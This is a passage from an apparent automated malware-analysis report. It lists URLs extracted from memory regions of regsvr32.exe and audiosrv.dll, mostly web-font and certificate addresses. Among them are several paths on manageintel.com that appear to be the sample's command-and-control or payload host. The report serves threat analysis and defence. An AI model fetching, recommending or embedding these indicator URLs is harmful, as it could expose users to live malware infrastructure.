https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwmxduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwkxduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/V	regsvr32.exe, 00000003.00000003.2401707553.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/=	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNK7lqDY.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidj18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.godaddy.com/websites/website-builder?isc=pwugc&utm_source=wsb&utm_medium=applica	regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qPK7lqDY.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2)	regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidh18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmRduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlP	regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401673136.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/tificate	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlS	regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/(	regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdj18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlD	regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401673136.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNa7lqDY.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.sectigo.com0	audiosrv.dll	false	URL Reputation: safe	unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7qsDJT9g.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdh18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_	regsvr32.exe, 00000003.00000002.2427394559.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmls	regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	audiosrv.dll	false	URL Reputation: safe	unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidi18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlc	regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
